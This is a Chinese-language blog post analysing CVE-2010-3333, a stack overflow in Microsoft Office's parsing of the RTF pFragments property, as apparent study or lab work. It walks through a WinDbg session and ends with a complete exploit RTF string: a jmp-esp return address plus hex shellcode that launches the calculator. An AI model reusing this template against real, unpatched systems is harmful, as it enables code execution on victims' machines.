CVE-2010-3333 microsoft RTF栈溢出漏洞分析

------------恢复内容开始------------

------------恢复内容开始------------

实验环境 

操作系统:Vmware Windows xp sp3

Office 版本:Microsoft Office Word 2003 

漏洞文件:MSO.DLL 11.0.5606.0 

调试器:Windbg:6.12.0002.633 x86 

 

漏洞描述

Microsoft office xp sp3、office 2003 xp3、office 2007 sp2、office2010等多个版本在处理 RTF 文档的绘图 pFragments 属性时产生的一个栈溢出漏洞。攻击者可以构造恶意的 RTF 文件,当用 WORD 打开恶意构 造的 RTF 文件,WORD 会直接将 RTF 中的数据复制到局部空间而无需验证复制数据的大小, 导致典型的栈溢出。

 

样本

 

 

 

 

 

 

 

一、漏洞信息

1. 漏洞简述

(必有)

  • 漏洞名称:microsoft RTF栈溢出漏洞

  • 漏洞编号:CVE-2010-3333

  • 漏洞类型:栈溢出

  • 漏洞影响:Microsoft office xp sp3、office 2003 xp3、office 2007 sp2、office2010等多个版本在处理 RTF 文档的绘图 pFragments 属性时产生的一个栈溢出漏洞。

  • CVSS评分:

  • 利用难度:simple

  • 基础权限:不需要

 

二、漏洞复现

 

1. 环境搭建

  • 操作系统:Vmware Windows xp sp3

    Office 版本:Microsoft Office Word 2003 

    漏洞文件:MSO.DLL 11.0.5606.0 

    调试器:Windbg:6.12.0002.633 x86 

2. 复现过程

1、利用metasploit生成可触发漏洞的poc样本

 

 

2、获取样本后,在windows xp下运行windbg ,并附加运行winword.exe

 

3、在windbg下按g继续运行word,并用word打开样本文件msf.rtf,发现word报错,并且未响应。

 

(7f8.684): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c8ac ebx=05000000 ecx=0000019b edx=00000000 esi=1104c24c edi=00130000
eip=30e9eb88 esp=00123d98 ebp=00123dd0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll - 
mso!Ordinal6426+0x64d:
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
错误代码 c0000005 (first chance)出现了栈溢出
错误文件是mso.dll  MSO.DLL 被视为一种 Microsoft Office 2010 component 文件。 它最常用于由 Microsoft 开发的 Microsoft Office 2010。 它使用 DLL 文件扩展名, 并被视为 Win64 DLL (动态链接库) 文件。

30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]   循环从esi指向的内存区域复制数据到内存的栈区域,每次是一个4个字节
这就出现了问题,从esi指定的内存区复制到栈上,没有检测栈的大小,导致edi指向的内存被覆盖,最后造成访问违例,触发异常指令地址为30e9eb88。
4、寻找出现问题函数
重新打开windbg,附加winword.exe进程,并下断点 
bp 30e9eb88

因各种问题出现错误问题指令地址不一定相同。

然后重复上面的操作,直到windbg运行到  rep movs dword ptr es:[edi],dword ptr [esi]

5、查看堆栈

输入kb

 发现出现7个函数,我们一一分析。

 

 

 

 

 

 首先明确一点内存中程序是从低地址到高地址排序,而函数中是从低地址到高地址,然后从ret指令返回值到之前函数

 如果最后调用的是问题函数,极有可能是倒数第二个函数调用问题函数,所以我们调试 mso!Ordinal753+0x306e函数

0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00123dd0 30f4cdbd 00123f3c 00000000 ffffffff mso!Ordinal6426+0x64d
00123e00 30f4a597 00123f88 00123f3c 00000000 mso!Ordinal753+0x306e
0012404c 30d4b199 00000000 0012408c 00000000 mso!Ordinal753+0x848
00124074 30d4b148 30d4ae32 014d14c8 014d1500 mso!Ordinal4196+0x61f
00124078 30d4ae32 014d14c8 014d1500 014d13b0 mso!Ordinal4196+0x5ce
0012407c 014d14c8 014d1500 014d13b0 30dc9d44 mso!Ordinal4196+0x2b8
00124080 014d1500 014d13b0 30dc9d44 00000000 0x14d14c8
00124084 014d13b0 30dc9d44 00000000 014d1118 0x14d1500
00124088 30dc9d44 00000000 014d1118 00124e38 0x14d13b0
0012408c 00000000 014d1118 00124e38 00000000 mso!Ordinal2940+0x158fc
0:000> uf mso!Ordinal753+0x306e
mso!Ordinal753+0x306e:
30f4cdbd 84c0            test    al,al
30f4cdbf 744c            je      mso!Ordinal753+0x30be (30f4ce0d)

mso!Ordinal753+0x3072:
30f4cdc1 3bfb            cmp     edi,ebx
30f4cdc3 c6451300        mov     byte ptr [ebp+13h],0
30f4cdc7 0f8d260a0000    jge     mso!Ordinal753+0x3aa4 (30f4d7f3)

mso!Ordinal753+0x307e:
30f4cdcd 8365f800        and     dword ptr [ebp-8],0
30f4cdd1 ff7514          push    dword ptr [ebp+14h]
30f4cdd4 8bc6            mov     eax,esi
30f4cdd6 f7d8            neg     eax
30f4cdd8 1bc0            sbb     eax,eax
30f4cdda 8d4df8          lea     ecx,[ebp-8]
30f4cddd 23c1            and     eax,ecx
30f4cddf 50              push    eax
30f4cde0 8b4508          mov     eax,dword ptr [ebp+8]
30f4cde3 4b              dec     ebx
30f4cde4 53              push    ebx
30f4cde5 47              inc     edi
30f4cde6 57              push    edi
30f4cde7 ff750c          push    dword ptr [ebp+0Ch]
30f4cdea e86efeffff      call    mso!Ordinal753+0x2f0e (30f4cc5d)
30f4cdef 84c0            test    al,al
30f4cdf1 740c            je      mso!Ordinal753+0x30b0 (30f4cdff)

mso!Ordinal753+0x30a4:
30f4cdf3 85f6            test    esi,esi
30f4cdf5 0f8559280000    jne     mso!Ordinal2257+0x128 (30f4f654)

mso!Ordinal753+0x30ac:
30f4cdfb c6451301        mov     byte ptr [ebp+13h],1

mso!Ordinal753+0x30b0:
30f4cdff 8b45fc          mov     eax,dword ptr [ebp-4]
30f4ce02 85c0            test    eax,eax
30f4ce04 0f853f281300    jne     mso!Ordinal1549+0x93fcc (3107f649)

mso!Ordinal753+0x30bb:
30f4ce0a 8a4513          mov     al,byte ptr [ebp+13h]

mso!Ordinal753+0x30be:
30f4ce0d 5e              pop     esi
30f4ce0e 5b              pop     ebx
30f4ce0f 5f              pop     edi
30f4ce10 c9              leave
30f4ce11 c21000          ret     10h

mso!Ordinal753+0x3aa4:
30f4d7f3 85f6            test    esi,esi
30f4d7f5 0f8400f6ffff    je      mso!Ordinal753+0x30ac (30f4cdfb)

mso!Ordinal753+0x3aac:
30f4d7fb 8b45fc          mov     eax,dword ptr [ebp-4]
30f4d7fe 8906            mov     dword ptr [esi],eax

mso!Ordinal753+0x3ab1:
30f4d800 8365fc00        and     dword ptr [ebp-4],0
30f4d804 e9f2f5ffff      jmp     mso!Ordinal753+0x30ac (30f4cdfb)

mso!Ordinal2257+0x128:
30f4f654 ff75f8          push    dword ptr [ebp-8]
30f4f657 8b55fc          mov     edx,dword ptr [ebp-4]
30f4f65a 8bce            mov     ecx,esi
30f4f65c e889ffffff      call    mso!Ordinal2257+0xbe (30f4f5ea)
30f4f661 84c0            test    al,al
30f4f663 0f8496d7ffff    je      mso!Ordinal753+0x30b0 (30f4cdff)

mso!Ordinal2257+0x13d:
30f4f669 e992e1ffff      jmp     mso!Ordinal753+0x3ab1 (30f4d800)

mso!Ordinal1549+0x93fcc:
3107f649 8b08            mov     ecx,dword ptr [eax]
3107f64b 50              push    eax
3107f64c ff5104          call    dword ptr [ecx+4]
3107f64f e9b6d7ecff      jmp     mso!Ordinal753+0x30bb (30f4ce0a)
 

查看该函数之后,发现(30f4cc5d)该地址在在之前的问题函数上,所以单步调试mso!Ordinal753+0x2f0e函数

 

然后再次下断点 bp 30f4cc5d

然后单步跟踪运行

 

0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc5e esp=00123dd0 ebp=00123e00 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f0f:
30f4cc5e 8bec            mov     ebp,esp
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc60 esp=00123dd0 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f11:
30f4cc60 83ec14          sub     esp,14h
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc63 esp=00123dbc ebp=00123dd0 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
mso!Ordinal753+0x2f14:
30f4cc63 837d1800        cmp     dword ptr [ebp+18h],0 ss:0023:00123de8=014d14e0
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc67 esp=00123dbc ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f18:
30f4cc67 57              push    edi
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc68 esp=00123db8 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f19:
30f4cc68 8bf8            mov     edi,eax
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc6a esp=00123db8 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f1b:
30f4cc6a 0f84b6291300    je      mso!Ordinal1549+0x93fa9 (3107f626)      [br=0]
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc70 esp=00123db8 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f21:
30f4cc70 8b4f08          mov     ecx,dword ptr [edi+8] ds:0023:00123f90=0012408c
0:000> p
eax=00123f88 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc73 esp=00123db8 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f24:
30f4cc73 53              push    ebx
0:000> p
eax=00123f88 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc74 esp=00123db4 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f25:
30f4cc74 56              push    esi
0:000> p
eax=00123f88 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc75 esp=00123db0 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f26:
30f4cc75 e892b4ddff      call    mso!Ordinal6594+0x596 (30d2810c)
0:000> p
eax=00124150 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc7a esp=00123db0 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f2b:
30f4cc7a ff750c          push    dword ptr [ebp+0Ch]  ss:0023:00123ddc=00000000
0:000> p
eax=00124150 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc7d esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f2e:
30f4cc7d 8b7064          mov     esi,dword ptr [eax+64h] ds:0023:001241b4=014d10f0
0:000> p
eax=00124150 ebx=00000000 ecx=0012408c edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc80 esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f31:
30f4cc80 8365f800        and     dword ptr [ebp-8],0  ss:0023:00123dc8=0000004c
0:000> p
eax=00124150 ebx=00000000 ecx=0012408c edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc84 esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f35:
30f4cc84 8b06            mov     eax,dword ptr [esi]  ds:0023:014d10f0=30d9ed10
0:000> p
eax=30d9ed10 ebx=00000000 ecx=0012408c edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc86 esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f37:
30f4cc86 8d4df0          lea     ecx,[ebp-10h]
0:000> p
eax=30d9ed10 ebx=00000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc89 esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f3a:
30f4cc89 51              push    ecx
0:000> p
eax=30d9ed10 ebx=00000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc8a esp=00123da8 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f3b:
30f4cc8a bb00000005      mov     ebx,5000000h
0:000> p
eax=30d9ed10 ebx=05000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc8f esp=00123da8 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f40:
30f4cc8f 56              push    esi
0:000> p
eax=30d9ed10 ebx=05000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc90 esp=00123da4 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f41:
30f4cc90 895df4          mov     dword ptr [ebp-0Ch],ebx ss:0023:00123dc4=004b0045
0:000> p
eax=30d9ed10 ebx=05000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc93 esp=00123da4 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f44:
30f4cc93 ff501c          call    dword ptr [eax+1Ch]  ds:0023:30d9ed2c=30e9eb62
0:000> p
(840.84c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c8ac ebx=05000000 ecx=0000019b edx=00000000 esi=1104c24c edi=00130000
eip=30e9eb88 esp=00123d98 ebp=00123dd0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mso!Ordinal6426+0x64d:
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

 

最后找到触发错误的指令。

30f4cc60 83ec14          sub     esp,14h     这里函数开辟了0x14字节大小的栈空间
30f4cc7a ff750c          push    dword ptr [ebp+0Ch]  ss:0023:00123ddc=00000000          这里开始执行错误函数,且exc寄存器中的值为0x0000c8ac,且操作为dword字节,所以除以4


用16进制打开msf.rtf,发现字段 ac c8实际被复制到寄存器exc中了,且寄存器esi中的数据皆为ac c8 的后续数据。

用txt文件打开查看数据文件,ac c8为复制内存大小,后面可以填充40个字符来覆盖栈,再用jum esp指令覆盖返回地址,最后填充shellcode。

 

 

4. 利用思路

1. 利用条件

     在txt文本创建rtf的数据结构,在加上覆盖返回地址,书写shellcode

{\rtf1{}{\shp{\*\shpinst{\sp{\sv 1;1;4142434445464748495051525354555657585960616263646566ae61d2300000000000000000000000000000000000000000909090909090909090909090909090909090909033C050B82E646C6C50B8656C333250B86B65726E508BC450B87B1D807CFFD033C050B82E65786550B863616C63508BC46A050B8AD23867CFFD033C050B8FACA817CFFD0}{\sn pfragments}}}}}

这是一个打开计算器的shellcode

2. 利用过程

txt文件修改成rtf文件,直接用word打开,然后弹出计算器

三、缓解措施

http://www.microft.com/zh-cn/download/details.aspx?id=8121

官方补丁采用了检测rtf文件中pFragments属性值大小是否大于4字节,若大于这挑走并返回,不再复制

四、参考文献

CVE-2010-3333解析_哔哩哔哩_bilibili

cve-2010-3333 分析简笔 - m4sterx - 博客园 (cnblogs.com)

漏洞战争

 

五、反思

首先从样本下手,用windbg分析该文件,发现错误指令,然后单步调试,一步步找到错误指令所在函数,然后对函数分析,发现错误原因。分析样本文件中的数据,寻找数据结构、返回地址位置、shellcode可以在的位置。最后利用漏洞。

posted @ 2021-09-16 18:17  丹青初鸿  阅读(418)  评论(0编辑  收藏  举报